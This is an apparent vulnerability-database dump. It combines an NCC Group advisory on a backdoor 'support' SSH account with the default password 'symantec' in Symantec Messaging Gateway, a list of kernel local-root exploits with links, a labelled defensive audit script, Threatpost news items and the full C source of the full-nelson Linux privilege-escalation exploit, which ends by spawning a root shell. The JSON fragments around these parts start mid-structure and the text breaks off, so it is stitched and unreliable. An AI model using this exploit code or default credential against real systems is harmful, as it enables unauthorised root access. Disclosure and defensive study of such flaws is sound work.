Description
=======
Summary
=======
Name: Symantec Messaging Gateway - SSH with backdoor user account + privilege escalation to root due to very old Kernel
Release Date: 30 November 2012
Reference: NGS00267
Discoverer: Ben Williams <ben.williams@ngssecure.com>
Vendor: Symantec
Vendor Reference:
Systems Affected: Symantec Messaging Gateway 9.5.3-3
Risk: High
Status: Published
========
TimeLine
========
Discovered: 18 April 2012
Released: 18 April 2012
Approved: 29 April 2012
Reported: 30 April 2012
Fixed: 27 August 2012
Published: 30 November 2012
===========
Description
===========
I. VULNERABILITY
-------------------------
Symantec Messaging Gateway 9.5.3-3 - SSH with backdoor user account + privilege escalation to root due to very old Kernel
II. BACKGROUND
-------------------------
Symantec Messaging Gateway 9.5.3-3 is the latest version of their Email Security Appliance.
III. DESCRIPTION
-------------------------
The "admin" SSH account has a restricted shell, and the password is set by the administrator during setup.
However, there is another SSH account "support" which has a default password, which is not changed during installation, and does not seem to be mentioned in the Symantec documentation as far as I can see (Installation Guide, Administration Guide or Command-line Guide). This account has a very easy-to-guess password, but many administrators may not know it exists.
Additionally, the Linux Kernel on the appliance has not been updated since late 2007 (almost 5 years), so it suffers from multiple privilege escalation issues (as do other old packages on the operating system). If SSH is accessible to an attacker, it is possible for them to log in and escalate to root.
=================
Technical Details
=================
IV. PROOF OF CONCEPT
-------------------------
Both the install wizard and the documentation prompt the administrator to change the password for the "admin" account, for both the UI and for SSH to the operating system. This admin account can SSH in to the appliance, with the new chosen password, and has a restricted shell environment where only certain application administration commands are possible.
It is not possible to log in as root. However, there is another account "support" which has a default password of "symantec" which is not mentioned anywhere in the installer or documentation (as far as I can see) and the password is not changed as part of the installation process. This account is able to log in to the OS via SSH, and does not have a restricted shell environment.
Additionally, the Linux Kernel is very old (2007), so it suffers from multiple privilege escalation issues.
[+] Results for kernel version 2.6.18-274.3.1.2.el5_sms
Potential exploits:
* Linux Kernel BCM Local Root Exploit
CVE: CVE-2010-2959
Affects kernels: 2.6.0-2.6.36rc1
Exploits:
http://www.exploit-db.com/exploits/14814
* Linux Kernel RDS protocol Local Root Exploit
CVE: CVE-2010-3904
Affects kernels: 2.6.0-2.6.36rc8
Exploits:
http://www.exploit-db.com/exploits/15285
* Linux Kernel econet_sendmsg() - half-nelson Local Root Exploit
CVE: CVE-2010-3848
Affects kernels: 2.6.0-2.6.36.2
Exploits:
http://www.exploit-db.com/exploits/17787
* Linux Kernel Unknown Local Root Exploit
CVE: CVE-None
Affects kernels: 2.6.18-2.6.20
Exploits:
http://www.exploit-db.com/exploits/10613
* Linux Kernel sock_sendpage() (Wunderbar Emporium) Local Root Exploit
CVE: CVE-2009-2692
Affects kernels: 2.6.0-2.6.31rc3
Exploits:
http://www.exploit-db.com/exploits/9641
http://www.exploit-db.com/exploits/9545
http://www.exploit-db.com/exploits/9479
http://www.exploit-db.com/exploits/9436
http://www.exploit-db.com/exploits/9435
http://www.grsecurity.net/~spender/enlightenment.tgz
* Linux Kernel pipe.c (MooseCox) Local Root Exploit
CVE: CVE-2009-3547
Affects kernels: 2.6.0-2.6.32rc5
Exploits:
http://www.exploit-db.com/exploits/10018
http://www.grsecurity.net/~spender/enlightenment.tgz
* Linux Kernel ReiserFS xattr Local Root Exploit
CVE: CVE-2010-1146
Affects kernels: 2.6.0-2.6.34rc3
Exploits:
http://www.exploit-db.com/exploits/12130
* Linux Kernel vmsplice Local Root Exploit
CVE: CVE-2008-0009
Affects kernels: 2.6.17-2.6.24.1
Exploits:
http://www.exploit-db.com/exploits/5092
http://www.exploit-db.com/exploits/5093
* Linux Kernel ec_dev_ioctl() - half-nelson Local Root Exploit
CVE: CVE-2010-3850
Affects kernels: 2.6.0-2.6.36.2
Exploits:
http://www.exploit-db.com/exploits/17787
http://www.exploit-db.com/exploits/15704
* Linux Kernel ACPI custom_method Local Root Exploit
CVE: CVE-2010-4347
Affects kernels: 2.6.0-2.6.37rc2
Exploits:
http://www.exploit-db.com/exploits/15774
* Linux Kernel ftruncate()/open() Local Root Exploit
CVE: CVE-2008-4210
Affects kernels: 2.6.0-2.6.22
Exploits:
http://www.exploit-db.com/exploits/6851
* Linux Kernel put_user() - full-nelson Local Root Exploit
CVE: CVE-2010-4258
Affects kernels: 2.6.0-2.6.37
Exploits:
http://www.exploit-db.com/exploits/15704
* Linux Kernel sock_no_sendpage() - full-nelson Local Root Exploit
CVE: CVE-2010-3849
Affects kernels: 2.6.0-2.6.37
Exploits:
http://www.exploit-db.com/exploits/15704
* Linux Kernel ipc - half-nelson Local Root Exploit
CVE: CVE-2010-4073
Affects kernels: 2.6.0-2.6.37rc1
Exploits:
http://www.exploit-db.com/exploits/17787
* Linux Kernel SELinux/RHEL5 (Cheddar Bay) Local Root Exploit
CVE: CVE-None
Affects kernels: 2.6.9-2.6.30
Exploits:
http://www.exploit-db.com/exploits/9208
http://www.exploit-db.com/exploits/9191
http://www.grsecurity.net/~spender/enlightenment.tgz
* Linux Kernel exit_notify() Local Root Exploit
CVE: CVE-2009-1337
Affects kernels: 2.6.0-2.6.29
Exploits:
http://www.exploit-db.com/exploits/8369
* Linux Kernel system call emulation Local Root Exploit
CVE: CVE-2007-4573
Affects kernels: 2.6.0-2.6.22.7
Exploits:
http://www.exploit-db.com/exploits/4460
* Linux Kernel set_selection() UTF-8 Off By One Local Root Exploit
CVE: CVE-2009-1046
Affects kernels: 2.6.0-2.6.28.3
Exploits:
http://www.exploit-db.com/exploits/9083
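Added example (not part of the original advisory, and not NCC Group or Symantec code): a defender-side audit for the condition described above, an account outside the documented set that has a usable password and a login shell, plus a check of sshd log lines for accepted logins by such accounts. The passwd, shadow and log samples are constructed, and the restricted-shell path, the "mailsvc" account and the KNOWN_ACCOUNTS inventory are assumptions made for illustration.

```python
import re

# Assumption: accounts the administrator expects to exist with a login shell.
KNOWN_ACCOUNTS = {"root", "admin"}

# Shells that refuse an interactive session.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}

# Constructed sample data in /etc/passwd format (shell path for "admin" is hypothetical).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
admin:x:500:500::/home/admin:/opt/example/restricted-cli
support:x:501:501::/home/support:/bin/bash
mailsvc:x:502:502::/var/spool/mail:/bin/bash
"""

# Constructed sample data in /etc/shadow format; hashes are placeholders.
SAMPLE_SHADOW = """\
root:$1$constructed$placeholder:15000:0:99999:7:::
bin:*:15000:0:99999:7:::
daemon:*:15000:0:99999:7:::
admin:$1$constructed$placeholder:15000:0:99999:7:::
support:$1$constructed$placeholder:15000:0:99999:7:::
mailsvc:!!:15000:0:99999:7:::
"""

# Constructed sshd log lines (documentation-range IP addresses).
SAMPLE_AUTH_LOG = """\
Nov 30 09:58:11 smg sshd[2101]: Accepted password for admin from 192.0.2.20 port 40112 ssh2
Nov 30 10:02:47 smg sshd[2140]: Failed password for support from 198.51.100.7 port 51890 ssh2
Nov 30 10:02:52 smg sshd[2140]: Accepted password for support from 198.51.100.7 port 51890 ssh2
Nov 30 10:03:30 smg sshd[2177]: Failed password for invalid user test from 198.51.100.7 port 51902 ssh2
"""

ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port \d+")


def parse_passwd(text):
    """Return {account: shell} from passwd-format text."""
    shells = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7 or line.startswith("#"):
            continue
        # An empty shell field means the system default shell, which is interactive.
        shells[fields[0]] = fields[6] or "/bin/sh"
    return shells


def parse_shadow(text):
    """Return {account: password field} from shadow-format text."""
    fields_by_user = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) >= 2 and not line.startswith("#"):
            fields_by_user[fields[0]] = fields[1]
    return fields_by_user


def unexpected_login_accounts(passwd_text, shadow_text, known):
    """Accounts outside `known` that have a login shell and a usable password.

    A password field starting with '!' or '*' is locked; an account missing
    from the shadow data is treated as locked. Key-based logins are not
    covered by this check.
    """
    shells = parse_passwd(passwd_text)
    passwords = parse_shadow(shadow_text)
    flagged = []
    for user, shell in shells.items():
        if user in known or shell in NOLOGIN_SHELLS:
            continue
        if passwords.get(user, "*").startswith(("!", "*")):
            continue
        flagged.append(user)
    return sorted(flagged)


def accepted_logins(log_text, accounts):
    """Return (user, source, method) for each accepted SSH login by `accounts`."""
    hits = []
    for line in log_text.splitlines():
        match = ACCEPTED_RE.search(line)
        if match and match.group(2) in accounts:
            hits.append((match.group(2), match.group(3), match.group(1)))
    return hits


if __name__ == "__main__":
    flagged = unexpected_login_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW, KNOWN_ACCOUNTS)
    print("Unexpected login-capable accounts:", flagged)
    for user, source, method in accepted_logins(SAMPLE_AUTH_LOG, set(flagged)):
        print("Accepted %s login for %s from %s" % (method, user, source))
```

Any account the first check reports should have its password changed or be locked, and any accepted login the second check reports for that account should be treated as a lead for investigation.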
===============
Fix Information
===============
An updated version of the software has been released to address the vulnerability:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00
NCC Group Research
http://www.nccgroup.com/research
["FS_PIPE_RACE_TO_NULL", "LINUX_RDS"]}, {"type": "centos", "idList": ["CESA-2008:0957", "CESA-2008:0972", "CESA-2008:0973", "CESA-2009:0001-01", "CESA-2009:0473", "CESA-2009:1222", "CESA-2009:1223", "CESA-2009:1233", "CESA-2009:1541", "CESA-2009:1548", "CESA-2009:1550", "CESA-2010:0792", "CESA-2011:0162"]}, {"type": "checkpoint_security", "idList": ["CPS:SK42600"]}, {"type": "cve", "idList": ["CVE-2007-4573", "CVE-2008-0009"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1864-1:B2834"]}, {"type": "exploitdb", "idList": ["EDB-ID:9083"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:587E07B26CFC9328AECA2A6FF11BCAF8"]}, {"type": "f5", "idList": ["SOL10772", "SOL16341", "SOL16489", "SOL8171"]}, {"type": "fedora", "idList": ["FEDORA:101AF111631", "FEDORA:6F955210EC"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/RDS_PRIV_ESC/", "MSF:EXPLOIT/LINUX/LOCAL/RDS_RDS_PAGE_COPY_USER_PRIV_ESC/"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-1794.NASL", "DEBIAN_DSA-1865.NASL", "DEBIAN_DSA-1928.NASL", "FEDORA_2008-1423.NASL", "FEDORA_2010-7779.NASL", "MANDRIVA_MDVSA-2009-135.NASL", "ORACLELINUX_ELSA-2009-1541.NASL", "ORACLEVM_OVMSA-2009-0009.NASL", "REDHAT-RHSA-2009-1587.NASL", "REDHAT-RHSA-2010-0842.NASL", "SLACKWARE_SSA_2009-230-01.NASL", "SUSE_KERNEL-4471.NASL", "UBUNTU_USN-1000-1.NASL", "UBUNTU_USN-974-1.NASL", "VMWARE_VMSA-2011-0012_REMOTE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122422", "OPENVAS:136141256231063132", "OPENVAS:136141256231064074", "OPENVAS:136141256231064669", "OPENVAS:136141256231064677", "OPENVAS:136141256231064704", "OPENVAS:136141256231064747", "OPENVAS:136141256231065259", "OPENVAS:136141256231066178", "OPENVAS:136141256231068662", "OPENVAS:1361412562310840605", "OPENVAS:1361412562310863447", "OPENVAS:1361412562310870380", "OPENVAS:1361412562310880838", "OPENVAS:64187", "OPENVAS:64745", "OPENVAS:64906", "OPENVAS:831196", "OPENVAS:840441", "OPENVAS:860126", "OPENVAS:880459", "OPENVAS:880731", "OPENVAS:880937"]}, {"type": 
"oraclelinux", "idList": ["ELSA-2007-0937", "ELSA-2008-0957", "ELSA-2008-0972", "ELSA-2008-0973", "ELSA-2009-0225", "ELSA-2009-1541", "ELSA-2009-1548", "ELSA-2009-1550", "ELSA-2010-0792", "ELSA-2010-0839", "ELSA-2010-2009", "ELSA-2010-2010", "ELSA-2011-0007", "ELSA-2011-0162", "ELSA-2011-0263", "ELSA-2011-0498"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:114856"]}, {"type": "redhat", "idList": ["RHSA-2008:0957", "RHSA-2008:0972", "RHSA-2008:0973", "RHSA-2009:1024", "RHSA-2009:1077", "RHSA-2009:1541", "RHSA-2009:1548", "RHSA-2009:1588", "RHSA-2009:1692", "RHSA-2010:0842", "RHSA-2011:0007", "RHSA-2011:0017", "RHSA-2011:0162"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26323", "SECURITYVULNS:VULN:12590", "SECURITYVULNS:VULN:8184"]}, {"type": "seebug", "idList": ["SSV:12576", "SSV:20924", "SSV:2921", "SSV:70036"]}, {"type": "slackware", "idList": ["SSA-2009-230-01"]}, {"type": "suse", "idList": ["SUSE-SA:2010:045", "SUSE-SA:2010:060", "SUSE-SA:2011:007"]}, {"type": "ubuntu", "idList": ["USN-1074-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2008-0009", "UB:CVE-2010-2959", "UB:CVE-2010-3904"]}, {"type": "vmware", "idList": ["VMSA-2011-0012.3"]}, {"type": "zdt", "idList": ["1337DAY-ID-33692"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "epss": [{"cve": "CVE-2010-3904", "epss": "0.000700000", "percentile": "0.284310000", "modified": "2023-03-19"}, {"cve": "CVE-2007-4573", "epss": "0.000420000", "percentile": "0.004970000", "modified": "2023-03-19"}, {"cve": "CVE-2010-4073", "epss": "0.000440000", "percentile": "0.081850000", "modified": "2023-03-19"}, {"cve": "CVE-2009-2692", "epss": "0.000580000", "percentile": "0.219710000", "modified": "2023-03-19"}, {"cve": "CVE-2009-1046", "epss": "0.000710000", "percentile": "0.289790000", "modified": "2023-03-19"}, {"cve": "CVE-2010-2959", "epss": "0.002750000", "percentile": "0.630670000", "modified": "2023-03-20"}, {"cve": "CVE-2008-0009", "epss": "0.000430000", "percentile": 
"0.077800000", "modified": "2023-03-20"}, {"cve": "CVE-2010-1146", "epss": "0.000420000", "percentile": "0.004970000", "modified": "2023-03-20"}, {"cve": "CVE-2010-3850", "epss": "0.000440000", "percentile": "0.081850000", "modified": "2023-03-19"}, {"cve": "CVE-2010-4258", "epss": "0.000440000", "percentile": "0.081850000", "modified": "2023-03-19"}, {"cve": "CVE-2009-3547", "epss": "0.000420000", "percentile": "0.004970000", "modified": "2023-03-19"}, {"cve": "CVE-2010-3848", "epss": "0.000440000", "percentile": "0.082520000", "modified": "2023-03-19"}, {"cve": "CVE-2009-1337", "epss": "0.000420000", "percentile": "0.004970000", "modified": "2023-03-19"}, {"cve": "CVE-2010-4347", "epss": "0.000440000", "percentile": "0.081850000", "modified": "2023-03-19"}, {"cve": "CVE-2008-4210", "epss": "0.000420000", "percentile": "0.004970000", "modified": "2023-03-19"}, {"cve": "CVE-2010-3849", "epss": "0.000440000", "percentile": "0.081850000", "modified": "2023-03-19"}], "vulnersScore": 0.2}, "_state": {"dependencies": 1678962961, "score": 1678963748, "affected_software_major_version": 0, "epss": 1679322135}, "_internal": {"score_hash": "4a639e1a5f351a495492666757b36d3b"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}
{"threatpost": [{"lastseen": "2018-10-06T23:06:30", "description": "An interesting exploit for the Linux kernel that enables an attacker to escalate his privileges on a local machine has popped up on the Full Disclosure mailing list. The exploit chains together three separate bugs to get root on a vulnerable machine.\n\nThe exploit was [posted Tuesday by Dan Rosenberg on Full Disclosure](<http://seclists.org/fulldisclosure/2010/Dec/85>) and he explains in his post that the exploit is specifically designed to be somewhat limited so that it\u2019s not easily usable by low-level attackers. The exploit affects Linux kernel version 2.6.37, however two of the bugs that Rosenberg uses in the exploit have been patched by two of the major Linux distributions. \n\n\u201cIn the interest of public safety, this exploit was specifically designed to be limited: \n* The particular symbols I resolve are not exported on Slackware or Debian \n* Red Hat does not support Econet by default \n* CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and Debian \nHowever, the important issue, CVE-2010-4258, affects everyone, and it would be trivial to find an unpatched DoS under KERNEL_DS and write a slightly more sophisticated version of this that doesn\u2019t have the roadblocks I put in to prevent abuse by script kiddies,\u201d Rosenberg wrote.\n\nThe most interesting of the three vulnerabilities, however, is a recent one that is still unpatched in the Linux kernel. The bug is a[ local address limit override vulnerability](<http://www.securityfocus.com/bid/45159>). \n\n\u201cThis is the interesting one, and the reason I wrote this exploit. If a thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL word will be written to a user-specified pointer when that thread exits. This write is done using put_user(), which ensures the provided destination resides in valid userspace by invoking access_ok(). 
However, Nelson discovered that when the kernel performs an address limit override via set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault, etc.), this override is not reverted before calling put_user() in the exit path, allowing a user to write a NULL word to an arbitrary kernel address. Note that this issue requires an additional vulnerability to trigger,\u201d Rosenberg wrote in his advisory.\n", "cvss3": {}, "published": "2010-12-08T15:33:53", "type": "threatpost", "title": "New Local Linux Kernel Root Exploit Published", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3849", "CVE-2010-3850", "CVE-2010-4258"], "modified": "2013-04-17T16:35:33", "id": "THREATPOST:5C498E77806919FE36F529695A6607BA", "href": "https://threatpost.com/new-local-linux-kernel-root-exploit-published-120810/74750/", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:19", "description": "There is a [NULL pointer dereference flaw in the Linux kernel](<http://lkml.org/lkml/2009/10/14/184>) that can be exploited by attackers to gain root access to a vulnerable machine.\n\nThe vulnerability is in version 2.6.21 of the Linux kernel and some Linux vendors already have taken steps to fix the vulnerability. Red Hat has released a [fix for the flaw](<https://rhn.redhat.com/cve/CVE-2009-3547.html>) in several versions of its Linux distributions. Red Hat also has released advisories on the issue, explaining the vulnerability and its effect on vulnerable machines.\n\nA NULL pointer dereference flaw was found in each of the following functions in the Linux kernel: pipe_read_open(), pipe_write_open(), and pipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could be released by other processes before it is used to update the pipe\u2019s reader and writer counters. 
This could lead to a local denial of service or privilege escalation.\n\nDebian also has posted instructions for addressing the [flaw in its Linux distributions](<http://wiki.debian.org/mmap_min_addr>), which are vulnerable to this problem by default. NULL pointer dereferences are particularly complex problems that are difficult to exploit in many cases. This particular problem was identified in mid-October and so far, there have not been any public exploits released for the Linux kernel flaw.\n", "cvss3": {}, "published": "2009-11-05T13:45:39", "type": "threatpost", "title": "Critical Flaw Found in Linux Kernel", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-3547"], "modified": "2018-08-15T14:16:20", "id": "THREATPOST:9B247D64D74F86C01215CC8DF7D85698", "href": "https://threatpost.com/critical-flaw-found-linux-kernel-110509/73037/", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:38", "description": "Hi all,\r\n\r\nI've included here a proof-of-concept local privilege escalation exploit\r\nfor Linux. Please read the header for an explanation of what's going\r\non. Without further ado, I present full-nelson.c:\r\n\r\nHappy hacking,\r\nDan\r\n\r\n\r\n--snip--\r\n\r\n/*\r\n * Linux Kernel <= 2.6.37 local privilege escalation\r\n * by Dan Rosenberg\r\n * @djrbliss on twitter\r\n *\r\n * Usage:\r\n * gcc full-nelson.c -o full-nelson\r\n * ./full-nelson\r\n *\r\n * This exploit leverages three vulnerabilities to get root, all of which were\r\n * discovered by Nelson Elhage:\r\n *\r\n * CVE-2010-4258\r\n * -------------\r\n * This is the interesting one, and the reason I wrote this exploit. 
If a\r\n * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL\r\n * word will be written to a user-specified pointer when that thread exits.\r\n * This write is done using put_user(), which ensures the provided destination\r\n * resides in valid userspace by invoking access_ok(). However, Nelson\r\n * discovered that when the kernel performs an address limit override via\r\n * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,\r\n * etc.), this override is not reverted before calling put_user() in the exit\r\n * path, allowing a user to write a NULL word to an arbitrary kernel address.\r\n * Note that this issue requires an additional vulnerability to trigger.\r\n *\r\n * CVE-2010-3849\r\n * -------------\r\n * This is a NULL pointer dereference in the Econet protocol. By itself, it's\r\n * fairly benign as a local denial-of-service. It's a perfect candidate to\r\n * trigger the above issue, since it's reachable via sock_no_sendpage(), which\r\n * subsequently calls sendmsg under KERNEL_DS.\r\n *\r\n * CVE-2010-3850\r\n * -------------\r\n * I wouldn't be able to reach the NULL pointer dereference and trigger the\r\n * OOPS if users weren't able to assign Econet addresses to arbitrary\r\n * interfaces due to a missing capabilities check.\r\n *\r\n * In the interest of public safety, this exploit was specifically designed to\r\n * be limited:\r\n *\r\n * * The particular symbols I resolve are not exported on Slackware or Debian\r\n * * Red Hat does not support Econet by default\r\n * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and\r\n * Debian\r\n *\r\n * However, the important issue, CVE-2010-4258, affects everyone, and it would\r\n * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly\r\n * more sophisticated version of this that doesn't have the roadblocks I put in\r\n * to prevent abuse by script kiddies.\r\n *\r\n * Tested on unpatched Ubuntu 10.04 kernels, both x86 and 
x86-64.\r\n *\r\n * NOTE: the exploit process will deadlock and stay in a zombie state after you\r\n * exit your root shell because the Econet thread OOPSes while holding the\r\n * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.\r\n *\r\n * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <fcntl.h>\r\n#include <sys/ioctl.h>\r\n#include <string.h>\r\n#include <net/if.h>\r\n#include <sched.h>\r\n#include <stdlib.h>\r\n#include <signal.h>\r\n#include <sys/utsname.h>\r\n#include <sys/mman.h>\r\n#include <unistd.h>\r\n\r\n/* How many bytes should we clear in our\r\n * function pointer to put it into userspace? */\r\n#ifdef __x86_64__\r\n#define SHIFT 24\r\n#define OFFSET 3\r\n#else\r\n#define SHIFT 8\r\n#define OFFSET 1\r\n#endif\r\n\r\n/* thanks spender... */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[512];\r\n struct utsname ver;\r\n int ret;\r\n int rep = 0;\r\n int oldstyle = 0;\r\n\r\n f = fopen("/proc/kallsyms", "r");\r\n if (f == NULL) {\r\n f = fopen("/proc/ksyms", "r");\r\n if (f == NULL)\r\n goto fallback;\r\n oldstyle = 1;\r\n }\r\n\r\nrepeat:\r\n ret = 0;\r\n while(ret != EOF) {\r\n if (!oldstyle)\r\n ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);\r\n else {\r\n ret = fscanf(f, "%p %s\n", (void **)&addr, sname);\r\n if (ret == 2) {\r\n char *p;\r\n if (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n continue;\r\n p = strrchr(sname, '_');\r\n if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n p = p - 4;\r\n while (p > (char *)sname && *(p - 1) == '_')\r\n p--;\r\n *p = '\0';\r\n }\r\n }\r\n }\r\n if (ret == 0) {\r\n fscanf(f, "%s\n", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? 
" (via System.map)" : "");\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n if (rep)\r\n return 0;\r\nfallback:\r\n uname(&ver);\r\n if (strncmp(ver.release, "2.6", 3))\r\n oldstyle = 1;\r\n sprintf(sname, "/boot/System.map-%s", ver.release);\r\n f = fopen(sname, "r");\r\n if (f == NULL)\r\n return 0;\r\n rep = 1;\r\n goto repeat;\r\n}\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\nstatic int __attribute__((regparm(3)))\r\ngetroot(void * file, void * vma)\r\n{\r\n\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n\r\n}\r\n\r\n/* Why do I do this? Because on x86-64, the address of\r\n * commit_creds and prepare_kernel_cred are loaded relative\r\n * to rip, which means I can't just copy the above payload\r\n * into my landing area. */\r\nvoid __attribute__((regparm(3)))\r\ntrampoline()\r\n{\r\n\r\n#ifdef __x86_64__\r\n asm("mov $getroot, %rax; call *%rax;");\r\n#else\r\n asm("mov $getroot, %eax; call *%eax;");\r\n#endif\r\n\r\n}\r\n\r\n/* Triggers a NULL pointer dereference in econet_sendmsg\r\n * via sock_no_sendpage, so it's under KERNEL_DS */\r\nint trigger(int * fildes)\r\n{\r\n int ret;\r\n struct ifreq ifr;\r\n\r\n memset(&ifr, 0, sizeof(ifr));\r\n strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);\r\n\r\n ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);\r\n\r\n if(ret < 0) {\r\n printf("[*] Failed to set Econet address.\n");\r\n return -1;\r\n }\r\n\r\n splice(fildes[3], NULL, fildes[1], NULL, 128, 0);\r\n splice(fildes[0], NULL, fildes[2], NULL, 128, 0);\r\n\r\n /* Shouldn't get here... 
*/\r\n exit(0);\r\n}\r\n\r\nint main(int argc, char * argv[])\r\n{\r\n unsigned long econet_ops, econet_ioctl, target, landing;\r\n int fildes[4], pid;\r\n void * newstack, * payload;\r\n\r\n /* Create file descriptors now so there are two\r\n references to them after cloning...otherwise\r\n the child will never return because it\r\n deadlocks when trying to unlock various\r\n mutexes after OOPSing */\r\n pipe(fildes);\r\n fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);\r\n fildes[3] = open("/dev/zero", O_RDONLY);\r\n\r\n if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {\r\n printf("[*] Failed to open file descriptors.\n");\r\n return -1;\r\n }\r\n\r\n /* Resolve addresses of relevant symbols */\r\n printf("[*] Resolving kernel addresses...\n");\r\n econet_ioctl = get_kernel_sym("econet_ioctl");\r\n econet_ops = get_kernel_sym("econet_ops");\r\n commit_creds = (_commit_creds) get_kernel_sym("commit_creds");\r\n prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");\r\n\r\n if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {\r\n printf("[*] Failed to resolve kernel symbols.\n");\r\n return -1;\r\n }\r\n\r\n if(!(newstack = malloc(65536))) {\r\n printf("[*] Failed to allocate memory.\n");\r\n return -1;\r\n }\r\n\r\n printf("[*] Calculating target...\n");\r\n target = econet_ops + 10 * sizeof(void *) - OFFSET;\r\n\r\n /* Clear the higher bits */\r\n landing = econet_ioctl << SHIFT >> SHIFT;\r\n\r\n payload = mmap((void *)(landing & ~0xfff), 2 * 4096,\r\n PROT_READ | PROT_WRITE | PROT_EXEC,\r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);\r\n\r\n if ((long)payload == -1) {\r\n printf("[*] Failed to mmap() at target address.\n");\r\n return -1;\r\n }\r\n\r\n memcpy((void *)landing, &trampoline, 1024);\r\n\r\n clone((int (*)(void *))trigger,\r\n (void *)((unsigned long)newstack + 65536),\r\n CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,\r\n &fildes, NULL, NULL, target);\r\n\r\n sleep(1);\r\n\r\n 
printf("[*] Triggering payload...\n");\r\n ioctl(fildes[2], 0, NULL);\r\n\r\n if(getuid()) {\r\n printf("[*] Exploit failed to get root.\n");\r\n return -1;\r\n }\r\n\r\n printf("[*] Got root!\n");\r\n execl("/bin/sh", "/bin/sh", NULL);\r\n}\r\n", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "securityvulns", "title": "Linux kernel exploit", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3850", "CVE-2010-4258", "CVE-2010-3849"], "modified": "2010-12-09T00:00:00", "id": "SECURITYVULNS:DOC:25260", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25260", "sourceData": "", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:27", "description": "Insufficient registry access validation on 32-bit syscalls emulation.", "cvss3": {}, "published": "2007-09-25T00:00:00", "type": "securityvulns", "title": "64-bit Linux kernel privilege escalation", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2007-4573"], "modified": "2007-09-25T00:00:00", "id": "SECURITYVULNS:VULN:8184", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8184", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:39", "description": "It's possible to overwrite kernel memory regions via recvmsg() for RDS protocol.", "cvss3": {}, "published": "2010-10-24T00:00:00", "type": "securityvulns", "title": "Linux kernel RDS protocol privilege escalation", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-24T00:00:00", "id": "SECURITYVULNS:VULN:11211", "href": 